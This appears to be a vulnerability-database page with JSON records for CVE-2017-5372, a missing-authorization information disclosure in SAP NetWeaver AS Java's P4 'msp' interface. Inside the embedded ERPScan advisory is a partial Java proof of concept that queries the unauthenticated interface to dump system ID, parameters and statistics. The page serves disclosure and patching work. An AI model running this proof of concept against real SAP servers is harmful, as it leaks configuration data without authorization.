            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-5372",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-5372",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-5372",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-750",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908. SAP Netweaver Application Server Java is prone to an authorization-bypass vulnerability. \nAttackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks. Application: SAP NetWeaver AS JAVA\n\nVersions Affected: SAP NetWeaver AS JAVA 7.11-7.4\n\nVendor URL: http://SAP.com\n\nBugs: Information disclosure\n\nSent:  10.03.2016\n\nReported: 11.03.2016\n\nVendor response: 11.03.2016\n\nDate of Public Advisory: 12.10.2016\n\nReference: SAP Security Note 2331908\n\nAuthor:  Vahagn @vah_13 Vardanyan (ERPScan)\n\n\n\nDescription\n\n1. ADVISORY INFORMATION\n\nTitle:[ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 MSPRUNTIMEINTERFACE\nINFORMATION DISCLOSURE\n\nAdvisory ID:[ERPSCAN-16-037]\n\nRisk: high\n\nAdvisory URL:\nhttps://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\n\nDate published: 11.01.2017\n\nVendors contacted: SAP\n\n2. VULNERABILITY INFORMATION\n\nClass: Information disclosure\n\nImpact: broken authentication\n\nRemotely Exploitable: yes\n\nLocally Exploitable: no\n\nCVE: CVE-2017-5372\n\nCVSS Information\n\nCVSS Base Score v3:    7.3 / 10\n\nCVSS Base Vector:\n\nAV : Attack Vector (Related exploit range) Network (N)\n\nAC : Attack Complexity (Required attack complexity) Low (L)\n\nPR : Privileges Required (Level of privileges needed to exploit) None (N)\n\nUI : User Interaction (Required user participation) None (N)\n\nS : Scope (Change in scope due to impact caused to components beyond the\nvulnerable component) Unchanged (U)\n\nC : Impact to Confidentiality Low (L)\n\nI : Impact to Integrity Low (L)\n\nA : Impact to Availability Low (L)\n\n\n3. \n\n4. VULNERABLE PACKAGES\n\n\nSERVERCORE\n\n7.11\n7.20\n7.30\n7.31\n7.40\n7.50\n\n\n5. SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, install SAP Security Note  2331908\n\n\n\n6. AUTHOR\n\n Vahagn Vardanyan (ERPScan)\n\n\n\n7. TECHNICAL DESCRIPTION\n\nSAP AS JAVA P4 function msp (MSPRuntimeInterface) does not require any\nauthorization to call the following functions:\n\n\ngetInformation\n\ngetParameters\n\ngetServiceInfo\n\ngetStatistic\n\ngetClientStatistic\n\nPoC (Java language)\n\n\npackage sap_p4_poc;\n\n*****\n\nProperties p = new Properties();\n\np.put(\"java.naming.factory.initial\",\n\"com.sap.engine.services.jndi.InitialContextFactoryImpl\");\n\np.put(\"java.naming.provider.url\", SAP_IP+\":\"+SAP_PORT);\n\nInitialContext initialContext = new InitialContext(p);\n\nContext initialContext = initialContext;\n\nMSPRuntimeInterface serialObj =\n(MSPRuntimeInterface)initialContext.lookup(\"msp\");\n\nSystem.out.println(\"----------------\" + serialObj +\n\"----------------------------------------\");\n\nSystem.out.println(\"----------------SID:\" + serialObj.getSystemId() +\n\"----------------------------------------\");\n\nSystem.out.println(\"----------------------getInformation:--------------------------------\");\n\nTreeMap Inf = serialObj.getInformation();\n\nprint_treee_map(Inf);\n\nSystem.out.println(\"----------------------getParameters:----------------------------------\");\n\nTreeMap Par = serialObj.getParameters();\n\nprint_treee_map(Par);\n\nSystem.out.println(\"-----------------------getServiceInfo:---------------------------------\");\n\nTreeMap Serv = serialObj.getServiceInfo();\n\nprint_treee_map(Serv);\n\nSystem.out.println(\"-----------------------getStatistic:---------------------------------\");\n\nTreeMap Stat = serialObj.getStatistic();\n\nprint_treee_map(Stat);\n\nSystem.out.println(\"-----------------------getClientStatistic:---------------------------------\");\n\nTreeMap Cli = serialObj.getClientStatistic();\n\nprint_treee_map(Cli);\n\n\n\n8. REPORT TIMELINE\n\nReported: 11.03.2016\n\nVendor response: 11.03.2016\n\nDate of Public Advisory: 12.10.2016\n\n\n9. REFERENCES\n\nhttps://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\n\n\n10. ABOUT ERPScan Research\n\nERPScan research team specializes in vulnerability research and analysis of\ncritical enterprise applications. It was acknowledged multiple times by the\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\njust in SAP!). \n\nERPScan researchers are proud of discovering new types of vulnerabilities\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\nnomination at BlackHat 2013. \n\nERPScan experts participated as speakers, presenters, and trainers at 60+\nprime international security conferences in 25+ countries across the\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\nseveral Fortune 2000 companies. \n\nERPScan researchers carry out the EAS-SEC project that is focused on\nenterprise application security awareness by issuing annual SAP security\nresearches. \n\nERPScan experts were interviewed in specialized info-sec resources and\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. \n\nOur team consists of highly-qualified researchers, specialized in various\nfields of cybersecurity (from web application to ICS/SCADA systems),\ngathering their experience to conduct the best SAP security research. \n\n11. ABOUT ERPScan\n\nERPScan is the most respected and credible Business Application\nCybersecurity provider. Founded in 2010, the company operates globally and\nenables large Oil and Gas, Financial, Retail and other organizations to\nsecure their mission-critical processes. Named as an aEmerging Vendora in\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\ndiscovering and resolving security vulnerabilities. ERPScan consultants\nwork with SAP SE in Walldorf to assist in improving the security of their\nlatest solutions. \n\nERPScanas primary mission is to close the gap between technical and\nbusiness security, and provide solutions for CISO\u0027s to evaluate and secure\nSAP and Oracle ERP systems and business-critical applications from both\ncyberattacks and internal fraud. As a rule, our clients are large\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\nactively monitor and manage security of vast SAP and Oracle landscapes on a\nglobal scale. \n\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\nto provide threat intelligence services, continuous support and to operate\nlocal offices and partner network spanning 20+ countries around the globe. \n\n\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nPhone: 650.798.5255\n\nTwitter: @erpscan\n\nScoop-it: Business Application Security\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "BID",
        "id": "93504"
      },
      {
        "db": "PACKETSTORM",
        "id": "140611"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-5372",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "93504",
        "trust": 1.9
      },
      {
        "db": "PACKETSTORM",
        "id": "140611",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "PACKETSTORM",
        "id": "140611"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "id": "VAR-201701-0793",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.27111164
  },
  "last_update_date": "2023-12-18T13:29:26.276000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SAP NetWeaver Technology Community",
        "trust": 0.8,
        "url": "http://www.sap.com/community/topic/netweaver.html"
      },
      {
        "title": "SAP AS JAVA P4 SERVERCORE Fixes for component security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67315"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/140611/sap-netweaver-as-java-p4-mspruntimeinterface-information-disclosure.html"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2017/jan/50"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/93504"
      },
      {
        "trust": 1.0,
        "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
      },
      {
        "trust": 1.0,
        "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
      },
      {
        "trust": 0.9,
        "url": "https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5372"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5372"
      },
      {
        "trust": 0.3,
        "url": "http://www.sap.com/"
      },
      {
        "trust": 0.3,
        "url": "https://www.onapsis.com/blog/switchable-authorization-checks-sap-security-notes-october-2016"
      },
      {
        "trust": 0.3,
        "url": "https://service.sap.com/sap/support/notes/2331908"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5372"
      },
      {
        "trust": 0.1,
        "url": "http://sap.com"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "93504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "PACKETSTORM",
        "id": "140611"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "93504"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "db": "PACKETSTORM",
        "id": "140611"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-10-11T00:00:00",
        "db": "BID",
        "id": "93504"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "date": "2017-01-19T14:09:31",
        "db": "PACKETSTORM",
        "id": "140611"
      },
      {
        "date": "2017-01-23T21:59:03.220000",
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "date": "2017-01-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-23T02:11:00",
        "db": "BID",
        "id": "93504"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      },
      {
        "date": "2018-12-10T19:29:23.517000",
        "db": "NVD",
        "id": "CVE-2017-5372"
      },
      {
        "date": "2017-02-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP AS JAVA of  P4 SERVERCORE Component  msp Vulnerabilities in which system information is obtained",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001370"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-750"
      }
    ],
    "trust": 0.6
  }
}

fkie_cve-2017-5372

Vulnerability from fkie_nvd

Published

2017-01-23 21:59

Modified

2024-11-21 03:27

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html	Third Party Advisory, VDB Entry
cve@mitre.org	http://seclists.org/fulldisclosure/2017/Jan/50	Mailing List, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/93504	Third Party Advisory, VDB Entry
cve@mitre.org	https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
cve@mitre.org	https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2017/Jan/50	Mailing List, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/93504	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
af854a3a-2127-422b-91ae-364da2661108	https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/

Impacted products

	Vendor	Product	Version
	sap	netweaver	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5007E3B7-3C36-4256-9E01-51C6F52FD0FF",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
    },
    {
      "lang": "es",
      "value": "La funci\u00f3n msp (tambi\u00e9n conocida como MSPRuntimeInterface) en el componente P4 SERVERCORE en SAP AS JAVA permite a atacantes remotos obtener informaci\u00f3n sensible del sistema aprovechando una verificaci\u00f3n de autorizaci\u00f3n perdida para la funci\u00f3n (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic o (5) getClientStatistic, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2331908."
    }
  ],
  "id": "CVE-2017-5372",
  "lastModified": "2024-11-21T03:27:28.123",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-01-23T21:59:03.220",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "VDB Entry"
      ],
      "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/93504"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "VDB Entry"
      ],
      "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/93504"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

gsd-2017-5372

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2017-5372

Aliases

CVE-2017-5372

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2017-5372",
    "description": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.",
    "id": "GSD-2017-5372"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2017-5372"
      ],
      "details": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908.",
      "id": "GSD-2017-5372",
      "modified": "2023-12-13T01:21:13.552116Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2017-5372",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/",
            "refsource": "MISC",
            "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
          },
          {
            "name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
          },
          {
            "name": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
          },
          {
            "name": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/",
            "refsource": "MISC",
            "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
          },
          {
            "name": "93504",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/93504"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-5372"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-200"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "93504",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/93504"
            },
            {
              "name": "20170119 [ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 - INFORMATION DISCLOSURE",
              "refsource": "FULLDISC",
              "tags": [
                "Mailing List",
                "VDB Entry"
              ],
              "url": "http://seclists.org/fulldisclosure/2017/Jan/50"
            },
            {
              "name": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/140611/SAP-NetWeaver-AS-Java-P4-MSPRUNTIMEINTERFACE-Information-Disclosure.html"
            },
            {
              "name": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/",
              "refsource": "MISC",
              "tags": [],
              "url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
            },
            {
              "name": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/",
              "refsource": "MISC",
              "tags": [],
              "url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
